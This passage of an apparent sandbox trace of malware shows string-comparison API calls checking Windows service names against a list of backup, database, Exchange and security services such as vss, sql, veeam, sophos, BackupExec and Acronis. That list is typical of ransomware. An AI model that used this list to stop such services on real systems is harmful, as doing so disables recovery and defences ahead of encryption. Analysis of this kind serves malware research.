(_String="GxCVD") returned 0x5 [0148.447] wcsstr (_Str="aelookupsvc", _SubStr="GxCIMgr") returned 0x0 [0148.447] wcslen (_String="GxCIMgr") returned 0x7 [0148.447] wcsstr (_Str="aelookupsvc", _SubStr="GXMMM") returned 0x0 [0148.447] wcslen (_String="GXMMM") returned 0x5 [0148.447] wcsstr (_Str="aelookupsvc", _SubStr="GxVssHWProv") returned 0x0 [0148.447] wcslen (_String="GxVssHWProv") returned 0xb [0148.447] wcsstr (_Str="aelookupsvc", _SubStr="GxFWD") returned 0x0 [0148.447] wcslen (_String="GxFWD") returned 0x5 [0148.447] wcsstr (_Str="aelookupsvc", _SubStr="SAPService") returned 0x0 [0148.447] wcslen (_String="SAPService") returned 0xa [0148.447] wcsstr (_Str="aelookupsvc", _SubStr="SAP") returned 0x0 [0148.448] wcslen (_String="SAP") returned 0x3 [0148.448] wcsstr (_Str="aelookupsvc", _SubStr="SAP$") returned 0x0 [0148.448] wcslen (_String="SAP$") returned 0x4 [0148.448] wcsstr (_Str="aelookupsvc", _SubStr="SAPD$,SAPHostControl") returned 0x0 [0148.448] wcslen (_String="SAPD$,SAPHostControl") returned 0x14 [0148.448] wcsstr (_Str="aelookupsvc", _SubStr="SAPHostExec") returned 0x0 [0148.448] wcslen (_String="SAPHostExec") returned 0xb [0148.448] wcsstr (_Str="aelookupsvc", _SubStr="QBCFMonitorService") returned 0x0 [0148.448] wcslen (_String="QBCFMonitorService") returned 0x12 [0148.448] wcsstr (_Str="aelookupsvc", _SubStr="QBDBMgrN") returned 0x0 [0148.448] wcslen (_String="QBDBMgrN") returned 0x8 [0148.448] wcsstr (_Str="aelookupsvc", _SubStr="QBIDPService") returned 0x0 [0148.448] wcslen (_String="QBIDPService") returned 0xc [0148.448] wcsstr (_Str="aelookupsvc", _SubStr="AcronisAgent") returned 0x0 [0148.448] wcslen (_String="AcronisAgent") returned 0xc [0148.448] wcsstr (_Str="aelookupsvc", _SubStr="VeeamNFSSvc") returned 0x0 [0148.448] wcslen (_String="VeeamNFSSvc") returned 0xb [0148.448] wcsstr (_Str="aelookupsvc", _SubStr="VeeamDeploymentService") returned 0x0 [0148.448] wcslen (_String="VeeamDeploymentService") returned 0x16 [0148.448] wcsstr (_Str="aelookupsvc", _SubStr="VeeamTransportSvc") returned 0x0 [0148.448] wcslen (_String="VeeamTransportSvc") returned 0x11 [0148.448] wcsstr (_Str="aelookupsvc", _SubStr="MVArmor") returned 0x0 [0148.448] wcslen (_String="MVArmor") returned 0x7 [0148.448] wcsstr (_Str="aelookupsvc", _SubStr="MVarmor64") returned 0x0 [0148.448] wcslen (_String="MVarmor64") returned 0x9 [0148.448] wcsstr (_Str="aelookupsvc", _SubStr="VSNAPVSS") returned 0x0 [0148.448] wcslen (_String="VSNAPVSS") returned 0x8 [0148.448] wcsstr (_Str="aelookupsvc", _SubStr="AcrSch2Svc") returned 0x0 [0148.448] wcslen (_String="AcrSch2Svc") returned 0xa [0148.449] _wcslwr (in: _String=0x15a966 | out: _String="alg") returned="alg" [0148.449] wcsstr (_Str="alg", _SubStr="vss") returned 0x0 [0148.449] wcslen (_String="vss") returned 0x3 [0148.449] wcsstr (_Str="alg", _SubStr="sql") returned 0x0 [0148.449] wcslen (_String="sql") returned 0x3 [0148.449] wcsstr (_Str="alg", _SubStr="sql$") returned 0x0 [0148.449] wcslen (_String="sql$") returned 0x4 [0148.449] wcsstr (_Str="alg", _SubStr="mysql") returned 0x0 [0148.449] wcslen (_String="mysql") returned 0x5 [0148.449] wcsstr (_Str="alg", _SubStr="mysql$") returned 0x0 [0148.449] wcslen (_String="mysql$") returned 0x6 [0148.449] wcsstr (_Str="alg", _SubStr="svc$") returned 0x0 [0148.449] wcslen (_String="svc$") returned 0x4 [0148.449] wcsstr (_Str="alg", _SubStr="memtas") returned 0x0 [0148.449] wcslen (_String="memtas") returned 0x6 [0148.449] wcsstr (_Str="alg", _SubStr="mepocs") returned 0x0 [0148.449] wcslen (_String="mepocs") returned 0x6 [0148.449] wcsstr (_Str="alg", _SubStr="sophos") returned 0x0 [0148.449] wcslen (_String="sophos") returned 0x6 [0148.449] wcsstr (_Str="alg", _SubStr="veeam") returned 0x0 [0148.449] wcslen (_String="veeam") returned 0x5 [0148.449] wcsstr (_Str="alg", _SubStr="backup") returned 0x0 [0148.449] wcslen (_String="backup") returned 0x6 [0148.449] wcsstr (_Str="alg", _SubStr="MSExchange") returned 0x0 [0148.449] wcslen (_String="MSExchange") returned 0xa [0148.449] wcsstr (_Str="alg", _SubStr="MSExchange$") returned 0x0 [0148.449] wcslen (_String="MSExchange$") returned 0xb [0148.449] wcsstr (_Str="alg", _SubStr="WSBExchange") returned 0x0 [0148.449] wcslen (_String="WSBExchange") returned 0xb [0148.449] wcsstr (_Str="alg", _SubStr="PDVFSService") returned 0x0 [0148.449] wcslen (_String="PDVFSService") returned 0xc [0148.450] wcsstr (_Str="alg", _SubStr="BackupExecVSSProvider") returned 0x0 [0148.450] wcslen (_String="BackupExecVSSProvider") returned 0x15 [0148.450] wcsstr (_Str="alg", _SubStr="BackupExecAgentAccelerator") returned 0x0 [0148.450] wcslen (_String="BackupExecAgentAccelerator") returned 0x1a [0148.450] wcsstr (_Str="alg", _SubStr="BackupExecAgentBrowser") returned 0x0 [0148.450] wcslen (_String="BackupExecAgentBrowser") returned 0x16 [0148.450] wcsstr (_Str="alg", _SubStr="BackupExecDiveciMediaService") returned 0x0 [0148.450] wcslen (_String="BackupExecDiveciMediaService") returned 0x1c [0148.450] wcsstr (_Str="alg", _SubStr="BackupExecJobEngine") returned 0x0 [0148.450] wcslen (_String="BackupExecJobEngine") returned 0x13 [0148.450] wcsstr (_Str="alg", _SubStr="BackupExecManagementService") returned 0x0 [0148.450] wcslen (_String="BackupExecManagementService") returned 0x1b [0148.450] wcsstr (_Str="alg", _SubStr="BackupExecRPCService") returned 0x0 [0148.450] wcslen (_String="BackupExecRPCService") returned 0x14 [0148.450] wcsstr (_Str="alg", _SubStr="GxBlr") returned 0x0 [0148.450] wcslen (_String="GxBlr") returned 0x5 [0148.450] wcsstr (_Str="alg", _SubStr="GxVss") returned 0x0 [0148.450] wcslen (_String="GxVss") returned 0x5 [0148.450] wcsstr (_Str="alg", _SubStr="GxClMgrS") returned 0x0 [0148.450] wcslen (_String="GxClMgrS") returned 0x8 [0148.450] wcsstr (_Str="alg", _SubStr="GxCVD") returned 0x0 [0148.450] wcslen (_String="GxCVD") returned 0x5 [0148.450] wcsstr (_Str="alg", _SubStr="GxCIMgr") returned 0x0 [0148.450] wcslen (_String="GxCIMgr") returned 0x7 [0148.450] wcsstr (_Str="alg", _SubStr="GXMMM") returned 0x0 [0148.450] wcslen (_String="GXMMM") returned 0x5 [0148.450] wcsstr (_Str="alg", _SubStr="GxVssHWProv") returned 0x0 [0148.450] wcslen (_String="GxVssHWProv") returned 0xb [0148.450] wcsstr (_Str="alg", _SubStr="GxFWD") returned 0x0 [0148.450] wcslen (_String="GxFWD") returned 0x5 [0148.451] wcsstr (_Str="alg", _SubStr="SAPService") returned 0x0 [0148.451] wcslen (_String="SAPService") returned 0xa [0148.451] wcsstr (_Str="alg", _SubStr="SAP") returned 0x0 [0148.451] wcslen (_String="SAP") returned 0x3 [0148.451] wcsstr (_Str="alg", _SubStr="SAP$") returned 0x0 [0148.451] wcslen (_String="SAP$") returned 0x4 [0148.451] wcsstr (_Str="alg", _SubStr="SAPD$,SAPHostControl") returned 0x0 [0148.451] wcslen (_String="SAPD$,SAPHostControl") returned 0x14 [0148.451] wcsstr (_Str="alg", _SubStr="SAPHostExec") returned 0x0 [0148.451] wcslen (_String="SAPHostExec") returned 0xb [0148.451] wcsstr (_Str="alg", _SubStr="QBCFMonitorService") returned 0x0 [0148.451] wcslen (_String="QBCFMonitorService") returned 0x12 [0148.451] wcsstr (_Str="alg", _SubStr="QBDBMgrN") returned 0x0 [0148.451] wcslen (_String="QBDBMgrN") returned 0x8 [0148.451] wcsstr (_Str="alg", _SubStr="QBIDPService") returned 0x0 [0148.451] wcslen (_String="QBIDPService") returned 0xc [0148.451] wcsstr (_Str="alg", _SubStr="AcronisAgent") returned 0x0 [0148.451] wcslen (_String="AcronisAgent") returned 0xc [0148.451] wcsstr (_Str="alg", _SubStr="VeeamNFSSvc") returned 0x0 [0148.451] wcslen (_String="VeeamNFSSvc") returned 0xb [0148.451] wcsstr (_Str="alg", _SubStr="VeeamDeploymentService") returned 0x0 [0148.451] wcslen (_String="VeeamDeploymentService") returned 0x16 [0148.451] wcsstr (_Str="alg", _SubStr="VeeamTransportSvc") returned 0x0 [0148.451] wcslen (_String="VeeamTransportSvc") returned 0x11 [0148.451] wcsstr (_Str="alg", _SubStr="MVArmor") returned 0x0 [0148.451] wcslen (_String="MVArmor") returned 0x7 [0148.451] wcsstr (_Str="alg", _SubStr="MVarmor64") returned 0x0 [0148.451] wcslen (_String="MVarmor64") returned 0x9 [0148.451] wcsstr (_Str="alg", _SubStr="VSNAPVSS") returned 0x0 [0148.451] wcslen (_String="VSNAPVSS") returned 0x8 [0148.451] wcsstr (_Str="alg", _SubStr="AcrSch2Svc") returned 0x0 [0148.451] wcslen (_String="AcrSch2Svc") returned 0xa [0148.451] _wcslwr (in: _String=0x15a910 | out: _String="appidsvc") returned="appidsvc" [0148.452] wcsstr (_Str="appidsvc", _SubStr="vss") returned 0x0 [0148.452] wcslen (_String="vss") returned 0x3 [0148.452] wcsstr (_Str="appidsvc", _SubStr="sql") returned 0x0 [0148.452] wcslen (_String="sql") returned 0x3 [0148.452] wcsstr (_Str="appidsvc", _SubStr="sql$") returned 0x0 [0148.452] wcslen (_String="sql$") returned 0x4 [0148.452] wcsstr (_Str="appidsvc", _SubStr="mysql") returned 0x0 [0148.452] wcslen (_String="mysql") returned 0x5 [0148.452] wcsstr (_Str="appidsvc", _SubStr="mysql$") returned 0x0 [0148.452] wcslen (_String="mysql$") returned 0x6 [0148.452] wcsstr (_Str="appidsvc", _SubStr="svc$") returned 0x0 [0148.452] wcslen (_String="svc$") returned 0x4 [0148.452] wcsstr (_Str="appidsvc", _SubStr="memtas") returned 0x0 [0148.452] wcslen (_String="memtas") returned 0x6 [0148.452] wcsstr (_Str="appidsvc", _SubStr="mepocs") returned 0x0 [0148.452] wcslen (_String="mepocs") returned 0x6 [0148.452] wcsstr (_Str="appidsvc", _SubStr="sophos") returned 0x0 [0148.452] wcslen (_String="sophos") returned 0x6 [0148.452] wcsstr (_Str="appidsvc", _SubStr="veeam") returned 0x0 [0148.452] wcslen (_String="veeam") returned 0x5 [0148.452] wcsstr (_Str="appidsvc", _SubStr="backup") returned 0x0 [0148.452] wcslen (_String="backup") returned 0x6 [0148.452] wcsstr (_Str="appidsvc", _SubStr="MSExchange") returned 0x0 [0148.452] wcslen (_String="MSExchange") returned 0xa [0148.452] wcsstr (_Str="appidsvc", _SubStr="MSExchange$") returned 0x0 [0148.452] wcslen (_String="MSExchange$") returned 0xb [0148.452] wcsstr (_Str="appidsvc", _SubStr="WSBExchange") returned 0x0 [0148.452] wcslen (_String="WSBExchange") returned 0xb [0148.452] wcsstr (_Str="appidsvc", _SubStr="PDVFSService") returned 0x0 [0148.452] wcslen (_String="PDVFSService") returned 0xc [0148.452] wcsstr (_Str="appidsvc", _SubStr="BackupExecVSSProvider") returned 0x0 [0148.452] wcslen (_String="BackupExecVSSProvider") returned 0x15 [0148.453] wcsstr (_Str="appidsvc", _SubStr="BackupExecAgentAccelerator") returned 0x0 [0148.453] wcslen (_String="BackupExecAgentAccelerator") returned 0x1a [0148.453] wcsstr (_Str="appidsvc", _SubStr="BackupExecAgentBrowser") returned 0x0 [0148.453] wcslen (_String="BackupExecAgentBrowser") returned 0x16 [0148.453] wcsstr (_Str="appidsvc", _SubStr="BackupExecDiveciMediaService") returned 0x0 [0148.453] wcslen (_String="BackupExecDiveciMediaService") returned 0x1c [0148.453] wcsstr (_Str="appidsvc", _SubStr="BackupExecJobEngine") returned 0x0 [0148.453] wcslen (_String="BackupExecJobEngine") returned 0x13 [0148.453] wcsstr (_Str="appidsvc", _SubStr="BackupExecManagementService") returned 0x0 [0148.453] wcslen (_String="BackupExecManagementService") returned 0x1b [0148.453] wcsstr (_Str="appidsvc", _SubStr="BackupExecRPCService") returned 0x0 [0148.453] wcslen (_String="BackupExecRPCService") returned 0x14 [0148.453] wcsstr (_Str="appidsvc", _SubStr="GxBlr") returned 0x0 [0148.453] wcslen (_String="GxBlr") returned 0x5 [0148.453] wcsstr (_Str="appidsvc", _SubStr="GxVss") returned 0x0 [0148.453] wcslen (_String="GxVss") returned 0x5 [0148.453] wcsstr (_Str="appidsvc", _SubStr="GxClMgrS") returned 0x0 [0148.453] wcslen (_String="GxClMgrS") returned 0x8 [0148.453] wcsstr (_Str="appidsvc", _SubStr="GxCVD") returned 0x0 [0148.453] wcslen (_String="GxCVD") returned 0x5 [0148.453] wcsstr (_Str="appidsvc", _SubStr="GxCIMgr") returned 0x0 [0148.453] wcslen (_String="GxCIMgr") returned 0x7 [0148.453] wcsstr (_Str="appidsvc", _SubStr="GXMMM") returned 0x0 [0148.453] wcslen (_String="GXMMM") returned 0x5 [0148.453] wcsstr (_Str="appidsvc", _SubStr="GxVssHWProv") returned 0x0 [0148.453] wcslen (_String="GxVssHWProv") returned 0xb [0148.453] wcsstr (_Str="appidsvc", _SubStr="GxFWD") returned 0x0 [0148.453] wcslen (_String="GxFWD") returned 0x5 [0148.453] wcsstr (_Str="appidsvc", _SubStr="SAPService") returned 0x0 [0148.453] wcslen (_String="SAPService") returned 0xa [0148.453] wcsstr (_Str="appidsvc", _SubStr="SAP") returned 0x0 [0148.454] wcslen (_String="SAP") returned 0x3 [0148.454] wcsstr (_Str="appidsvc", _SubStr="SAP$") returned 0x0 [0148.454] wcslen (_String="SAP$") returned 0x4 [0148.454] wcsstr (_Str="appidsvc", _SubStr="SAPD$,SAPHostControl") returned 0x0 [0148.454] wcslen (_String="SAPD$,SAPHostControl") returned 0x14 [0148.454] wcsstr (_Str="appidsvc", _SubStr="SAPHostExec") returned 0x0 [0148.454] wcslen (_String="SAPHostExec") returned 0xb [0148.454] wcsstr (_Str="appidsvc", _SubStr="QBCFMonitorService") returned 0x0 [0148.454] wcslen (_String="QBCFMonitorService") returned 0x12 [0148.454] wcsstr (_Str="appidsvc", _SubStr="QBDBMgrN") returned 0x0 [0148.454] wcslen (_String="QBDBMgrN") returned 0x8 [0148.454] wcsstr (_Str="appidsvc", _SubStr="QBIDPService") returned 0x0 [0148.454] wcslen (_String="QBIDPService") returned 0xc [0148.454] wcsstr (_Str="appidsvc", _SubStr="AcronisAgent") returned 0x0 [0148.454] wcslen (_String="AcronisAgent") returned 0xc [0148.454] wcsstr (_Str="appidsvc", _SubStr="VeeamNFSSvc") returned 0x0 [0148.454] wcslen (_String="VeeamNFSSvc") returned 0xb [0148.454] wcsstr (_Str="appidsvc", _SubStr="VeeamDeploymentService") returned 0x0 [0148.454] wcslen (_String="VeeamDeploymentService") returned 0x16 [0148.454] wcsstr (_Str="appidsvc", _SubStr="VeeamTransportSvc") returned 0x0 [0148.454] wcslen (_String="VeeamTransportSvc") returned 0x11 [0148.454] wcsstr (_Str="appidsvc", _SubStr="MVArmor") returned 0x0 [0148.454] wcslen (_String="MVArmor") returned 0x7 [0148.454] wcsstr (_Str="appidsvc", _SubStr="MVarmor64") returned 0x0 [0148.454] wcslen (_String="MVarmor64") returned 0x9 [0148.454] wcsstr (_Str="appidsvc", _SubStr="VSNAPVSS") returned 0x0 [0148.454] wcslen (_String="VSNAPVSS") returned 0x8 [0148.454] wcsstr (_Str="appidsvc", _SubStr="AcrSch2Svc") returned 0x0 [0148.454] wcslen (_String="AcrSch2Svc") returned 0xa [0148.454] _wcslwr (in: _String=0x15a8d6 | out: _String="appinfo") returned="appinfo" [0148.455] wcsstr (_Str="appinfo", _SubStr="vss") returned 0x0 [0148.455] wcslen (_String="vss") returned 0x3 [0148.455] wcsstr (_Str="appinfo", _SubStr="sql") returned 0x0 [0148.455] wcslen (_String="sql") returned 0x3 [0148.455] wcsstr (_Str="appinfo", _SubStr="sql$") returned 0x0 [0148.455] wcslen (_String="sql$") returned 0x4 [0148.455] wcsstr (_Str="appinfo", _SubStr="mysql") returned 0x0 [0148.455] wcslen (_String="mysql") returned 0x5 [0148.455] wcsstr (_Str="appinfo", _SubStr="mysql$") returned 0x0 [0148.455] wcslen (_String="mysql$") returned 0x6 [0148.455] wcsstr (_Str="appinfo", _SubStr="svc$") returned 0x0 [0148.455] wcslen (_String="svc$") returned 0x4 [0148.455] wcsstr (_Str="appinfo", _SubStr="memtas") returned 0x0 [0148.455] wcslen (_String="memtas") returned 0x6 [0148.455] wcsstr (_Str="appinfo", _SubStr="mepocs") returned 0x0 [0148.455] wcslen (_String="mepocs") returned 0x6 [0148.455] wcsstr (_Str="appinfo", _SubStr="sophos") returned 0x0 [0148.455] wcslen (_String="sophos") returned 0x6 [0148.455] wcsstr (_Str="appinfo", _SubStr="veeam") returned 0x0 [0148.455] wcslen (_String="veeam") returned 0x5 [0148.455] wcsstr (_Str="appinfo", _SubStr="backup") returned 0x0 [0148.455] wcslen (_String="backup") returned 0x6 [0148.455] wcsstr (_Str="appinfo", _SubStr="MSExchange") returned 0x0 [0148.455] wcslen (_String="MSExchange") returned 0xa [0148.455] wcsstr (_Str="appinfo", _SubStr="MSExchange$") returned 0x0 [0148.455] wcslen (_String="MSExchange$") returned 0xb [0148.455] wcsstr (_Str="appinfo", _SubStr="WSBExchange") returned 0x0 [0148.455] wcslen (_String="WSBExchange") returned 0xb [0148.455] wcsstr (_Str="appinfo", _SubStr="PDVFSService") returned 0x0 [0148.455] wcslen (_String="PDVFSService") returned 0xc [0148.455] wcsstr (_Str="appinfo", _SubStr="BackupExecVSSProvider") returned 0x0 [0148.455] wcslen (_String="BackupExecVSSProvider") returned 0x15 [0148.456] wcsstr (_Str="appinfo", _SubStr="BackupExecAgentAccelerator") returned 0x0 [0148.456] wcslen (_String="BackupExecAgentAccelerator") returned 0x1a [0148.456] wcsstr (_Str="appinfo", _SubStr="BackupExecAgentBrowser") returned 0x0 [0148.456] wcslen (_String="BackupExecAgentBrowser") returned 0x16 [0148.456] wcsstr (_Str="appinfo", _SubStr="BackupExecDiveciMediaService") returned 0x0 [0148.456] wcslen (_String="BackupExecDiveciMediaService") returned 0x1c [0148.456] wcsstr (_Str="appinfo", _SubStr="BackupExecJobEngine") returned 0x0 [0148.456] wcslen (_String="BackupExecJobEngine") returned 0x13 [0148.456] wcsstr (_Str="appinfo", _SubStr="BackupExecManagementService") returned 0x0 [0148.456] wcslen (_String="BackupExecManagementService") returned 0x1b [0148.456] wcsstr (_Str="appinfo", _SubStr="BackupExecRPCService") returned 0x0 [0148.456] wcslen (_String="BackupExecRPCService") returned 0x14 [0148.456] wcsstr (_Str="appinfo", _SubStr="GxBlr") returned 0x0 [0148.456] wcslen (_String="GxBlr") returned 0x5 [0148.456] wcsstr (_Str="appinfo", _SubStr="GxVss") returned 0x0 [0148.456] wcslen (_String="GxVss") returned 0x5 [0148.456] wcsstr (_Str="appinfo", _SubStr="GxClMgrS") returned 0x0 [0148.456] wcslen (_String="GxClMgrS") returned 0x8 [0148.456] wcsstr (_Str="appinfo", _SubStr="GxCVD") returned 0x0 [0148.456] wcslen (_String="GxCVD") returned 0x5 [0148.456] wcsstr (_Str="appinfo", _SubStr="GxCIMgr") returned 0x0 [0148.456] wcslen (_String="GxCIMgr") returned 0x7 [0148.456] wcsstr (_Str="appinfo", _SubStr="GXMMM") returned 0x0 [0148.456] wcslen (_String="GXMMM") returned 0x5 [0148.456] wcsstr (_Str="appinfo", _SubStr="GxVssHWProv") returned 0x0 [0148.456] wcslen (_String="GxVssHWProv") returned 0xb [0148.456] wcsstr (_Str="appinfo", _SubStr="GxFWD") returned 0x0 [0148.456] wcslen (_String="GxFWD") returned 0x5 [0148.456] wcsstr (_Str="appinfo", _SubStr="SAPService") returned 0x0 [0148.457] wcslen (_String="SAPService") returned 0xa [0148.457] wcsstr (_Str="appinfo", _SubStr="SAP") returned 0x0 [0148.457] wcslen (_String="SAP") returned 0x3 [0148.457] wcsstr (_Str="appinfo", _SubStr="SAP$") returned 0x0 [0148.457] wcslen (_String="SAP$") returned 0x4 [0148.457] wcsstr (_Str="appinfo", _SubStr="SAPD$,SAPHostControl") returned 0x0 [0148.457] wcslen (_String="SAPD$,SAPHostControl") returned 0x14 [0148.457] wcsstr (_Str="appinfo", _SubStr="SAPHostExec") returned 0x0 [0148.457] wcslen (_String="SAPHostExec") returned 0xb [0148.457] wcsstr (_Str="appinfo", _SubStr="QBCFMonitorService") returned 0x0 [0148.457] wcslen (_String="QBCFMonitorService") returned 0x12 [0148.457] wcsstr (_Str="appinfo", _SubStr="QBDBMgrN") returned 0x0 [0148.457] wcslen (_String="QBDBMgrN") returned 0x8 [0148.457] wcsstr (_Str="appinfo", _SubStr="QBIDPService") returned 0x0 [0148.457] wcslen (_String="QBIDPService") returned 0xc [0148.457] wcsstr (_Str="appinfo", _SubStr="AcronisAgent") returned 0x0 [0148.457] wcslen (_String="AcronisAgent") returned 0xc [0148.457] wcsstr (_Str="appinfo", _SubStr="VeeamNFSSvc") returned 0x0 [0148.457] wcslen (_String="VeeamNFSSvc") returned 0xb [0148.457] wcsstr (_Str="appinfo", _SubStr="VeeamDeploymentService") returned 0x0 [0148.457] wcslen (_String="VeeamDeploymentService") returned 0x16 [0148.457] wcsstr (_Str="appinfo", _SubStr="VeeamTransportSvc") returned 0x0 [0148.457] wcslen (_String="VeeamTransportSvc") returned 0x11 [0148.457] wcsstr (_Str="appinfo", _SubStr="MVArmor") returned 0x0 [0148.457] wcslen (_String="MVArmor") returned 0x7 [0148.457] wcsstr (_Str="appinfo", _SubStr="MVarmor64") returned 0x0 [0148.457] wcslen (_String="MVarmor64") returned 0x9 [0148.457] wcsstr (_Str="appinfo", _SubStr="VSNAPVSS") returned 0x0 [0148.457] wcslen (_String="VSNAPVSS") returned 0x8 [0148.458] wcsstr (_Str="appinfo", _SubStr="AcrSch2Svc") returned 0x0 [0148.458] wcslen (_String="AcrSch2Svc") returned 0xa [0148.458] _wcslwr (in: _String=0x15a896 | out: _String="appmgmt") returned="appmgmt" [0148.458] wcsstr (_Str="appmgmt", _SubStr="vss") returned 0x0 [0148.458] wcslen (_String="vss") returned 0x3 [0148.458] wcsstr (_Str="appmgmt", _SubStr="sql") returned 0x0 [0148.458] wcslen (_String="sql") returned 0x3 [0148.458] wcsstr (_Str="appmgmt", _SubStr="sql$") returned 0x0 [0148.458] wcslen (_String="sql$") returned 0x4 [0148.458] wcsstr (_Str="appmgmt", _SubStr="mysql") returned 0x0 [0148.458] wcslen (_String="mysql") returned 0x5 [0148.458] wcsstr (_Str="appmgmt", _SubStr="mysql$") returned 0x0 [0148.458] wcslen (_String="mysql$") returned 0x6 [0148.458] wcsstr (_Str="appmgmt", _SubStr="svc$") returned 0x0 [0148.458] wcslen (_String="svc$") returned 0x4 [0148.458] wcsstr (_Str="appmgmt", _SubStr="memtas") returned 0x0 [0148.458] wcslen (_String="memtas") returned 0x6 [0148.458] wcsstr (_Str="appmgmt", _SubStr="mepocs") returned 0x0 [0148.458] wcslen (_String="mepocs") returned 0x6 [0148.458] wcsstr (_Str="appmgmt", _SubStr="sophos") returned 0x0 [0148.458] wcslen (_String="sophos") returned 0x6 [0148.458] wcsstr (_Str="appmgmt", _SubStr="veeam") returned 0x0 [0148.458] wcslen (_String="veeam") returned 0x5 [0148.458] wcsstr (_Str="appmgmt", _SubStr="backup") returned 0x0 [0148.458] wcslen (_String="backup") returned 0x6 [0148.458] wcsstr (_Str="appmgmt", _SubStr="MSExchange") returned 0x0 [0148.459] wcslen (_String="MSExchange") returned 0xa [0148.459] wcsstr (_Str="appmgmt", _SubStr="MSExchange$") returned 0x0 [0148.459] wcslen (_String="MSExchange$") returned 0xb [0148.459] wcsstr (_Str="appmgmt", _SubStr="WSBExchange") returned 0x0 [0148.459] wcslen (_String="WSBExchange") returned 0xb [0148.459] wcsstr (_Str="appmgmt", _SubStr="PDVFSService") returned 0x0 [0148.459] wcslen (_String="PDVFSService") returned 0xc [0148.459] wcsstr (_Str="appmgmt", _SubStr="BackupExecVSSProvider") returned 0x0 [0148.459] wcslen (_String="BackupExecVSSProvider") returned 0x15 [0148.459] wcsstr (_Str="appmgmt", _SubStr="BackupExecAgentAccelerator") returned 0x0 [0148.459] wcslen (_String="BackupExecAgentAccelerator") returned 0x1a [0148.459] wcsstr (_Str="appmgmt", _SubStr="BackupExecAgentBrowser") returned 0x0 [0148.459] wcslen (_String="BackupExecAgentBrowser") returned 0x16 [0148.459] wcsstr (_Str="appmgmt", _SubStr="BackupExecDiveciMediaService") returned 0x0 [0148.459] wcslen (_String="BackupExecDiveciMediaService") returned 0x1c [0148.459] _wcslwr (in: _String=0x15a84e | out: _String="aspnet_state") returned="aspnet_state" [0148.459] _wcslwr (in: _String=0x15a7f8 | out: _String="audioendpointbuilder") returned="audioendpointbuilder" [0148.459] _wcslwr (in: _String=0x15a7a8 | out: _String="audiosrv") returned="audiosrv" [0148.459] _wcslwr (in: _String=0x15a77a | out: _String="axinstsv") returned="axinstsv" [0148.459] _wcslwr (in: _String=0x15a732 | out: _String="bdesvc") returned="bdesvc" [0148.459] _wcslwr (in: _String=0x15a6e4 | out: _String="bfe") returned="bfe" [0148.459] _wcslwr (in: _String=0x15a6ae | out: _String="bits") returned="bits" [0148.459] _wcslwr (in: _String=0x15a64e | out: _String="browser") returned="browser" [0148.459] _wcslwr (in: _String=0x15a61c | out: _String="bthserv") returned="bthserv" [0148.459] _wcslwr (in: _String=0x15a5d0 | out: _String="certpropsvc") returned="certpropsvc" [0148.460] _wcslwr (in: _String=0x15a562 | out: _String="clr_optimization_v2.0.50727_32") returned="clr_optimization_v2.0.50727_32" [0148.460] _wcslwr (in: _String=0x15a4ca | out: _String="clr_optimization_v2.0.50727_64") returned="clr_optimization_v2.0.50727_64" [0148.460] _wcslwr (in: _String=0x15a432 | out: _String="clr_optimization_v4.0.30319_32") returned="clr_optimization_v4.0.30319_32" [0148.460] _wcslwr (in: _String=0x15a39a | out: _String="clr_optimization_v4.0.30319_64") returned="clr_optimization_v4.0.30319_64" [0148.460] _wcslwr (in: _String=0x15a32c | out: _String="comsysapp") returned="comsysapp" [0148.460] _wcslwr (in: _String=0x15a2ea | out: _String="cryptsvc") returned="cryptsvc" [0148.460] _wcslwr (in: _String=0x15a2a6 | out: _String="cscservice") returned="cscservice" [0148.460] _wcslwr (in: _String=0x15a274 | out: _String="dcomlaunch") returned="dcomlaunch" [0148.460] _wcslwr (in: _String=0x15a226 | out: _String="defragsvc") returned="defragsvc" [0148.460] _wcslwr (in: _String=0x15a1f8 | out: _String="dhcp") returned="dhcp" [0148.460] _wcslwr (in: _String=0x15a1ce | out: _String="dnscache") returned="dnscache" [0148.460] _wcslwr (in: _String=0x15a1a8 | out: _String="dot3svc") returned="dot3svc" [0148.460] _wcslwr (in: _String=0x15a17e | out: _String="dps") returned="dps" [0148.460] _wcslwr (in: _String=0x15a13a | out: _String="eaphost") returned="eaphost" [0148.460] _wcslwr (in: _String=0x15a0ec | out: _String="efs") returned="efs" [0148.460] _wcslwr (in: _String=0x15a0a2 | out: _String="ehrecvr") returned="ehrecvr" [0148.460] _wcslwr (in: _String=0x15a046 | out: _String="ehsched") returned="ehsched" [0148.460] _wcslwr (in: _String=0x159fe6 | out: _String="eventlog") returned="eventlog" [0148.460] _wcslwr (in: _String=0x159faa | out: _String="eventsystem") returned="eventsystem" [0148.461] _wcslwr (in: _String=0x159f7e | out: _String="fax") returned="fax" [0148.461] _wcslwr (in: _String=0x159f66 | out: _String="fdphost") returned="fdphost" [0148.461] _wcslwr (in: _String=0x159f12 | out: _String="fdrespub") returned="fdrespub" [0148.461] _wcslwr (in: _String=0x159eae | out: _String="fontcache") returned="fontcache" [0148.461] _wcslwr (in: _String=0x159e56 | out: _String="fontcache3.0.0.0") returned="fontcache3.0.0.0" [0148.461] _wcslwr (in: _String=0x159de4 | out: _String="gpsvc") returned="gpsvc" [0148.461] _wcslwr (in: _String=0x159dac | out: _String="gupdate") returned="gupdate" [0148.461] _wcslwr (in: _String=0x159d5a | out: _String="gupdatem") returned="gupdatem" [0148.461] _wcslwr (in: _String=0x159d08 | out: _String="hidserv") returned="hidserv" [0148.461] _wcslwr (in: _String=0x159cbe | out: _String="hkmsvc") returned="hkmsvc" [0148.461] _wcslwr (in: _String=0x159c4e | out: _String="homegrouplistener") returned="homegrouplistener" [0148.461] _wcslwr (in: _String=0x159c04 | out: _String="homegroupprovider") returned="homegroupprovider" [0148.461] _wcslwr (in: _String=0x159bd2 | out: _String="idsvc") returned="idsvc" [0148.461] _wcslwr (in: _String=0x159ba0 | out: _String="ikeext") returned="ikeext" [0148.461] _wcslwr (in: _String=0x159b44 | out: _String="ipbusenum") returned="ipbusenum" [0148.461] _wcslwr (in: _String=0x159b02 | out: _String="iphlpsvc") returned="iphlpsvc" [0148.461] _wcslwr (in: _String=0x159ae0 | out: _String="keyiso") returned="keyiso" [0148.461] _wcslwr (in: _String=0x159ab0 | out: _String="ktmrm") returned="ktmrm" [0148.461] _wcslwr (in: _String=0x159a3a | out: _String="lanmanserver") returned="lanmanserver" [0148.461] _wcslwr (in: _String=0x159a08 | out: _String="lanmanworkstation") returned="lanmanworkstation" [0148.462] _wcslwr (in: _String=0x1599e0 | out: _String="lltdsvc") returned="lltdsvc" [0148.462] _wcslwr (in: _String=0x159986 | out: _String="lmhosts") returned="lmhosts" [0148.462] _wcslwr (in: _String=0x15994a | out: _String="mcx2svc") returned="mcx2svc" 